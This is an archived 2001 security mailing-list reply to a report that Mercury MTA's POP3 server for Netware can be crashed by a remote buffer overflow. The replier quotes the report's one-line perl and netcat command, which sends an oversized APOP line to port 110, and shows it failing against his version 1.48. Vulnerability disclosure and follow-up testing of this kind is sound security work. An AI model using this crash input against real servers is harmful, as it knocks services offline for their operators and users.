Przemyslaw Frasunek wrote: > All versions of widely-used POP3 server from Mercury MTA package for Netware > are vulnerable to remote buffer overflow allowing to crash Netware server: > > perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110 On my copy of MercuryP/NLM 1.48 it doesn't work: $ perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc xxx.yyy.zzz 110 +OK <105950536.4821at_private>, MercuryP/NLM v1.48 ready. -ERR Too many failures - try again later. $ telnet xxx.yyy.zzz 110 Trying... Connected to xxx.yyy.zzz. Escape character is '^]'. +OK <105952409.20153at_private>, MercuryP/NLM v1.48 ready. -- ## Adam Osuchowski adwolat_private, adwolat_private ## Silesian University of Technology, Computer Centre Gliwice, Poland
This archive was generated by hypermail 2b30 : Mon Apr 23 2001 - 12:11:14 PDT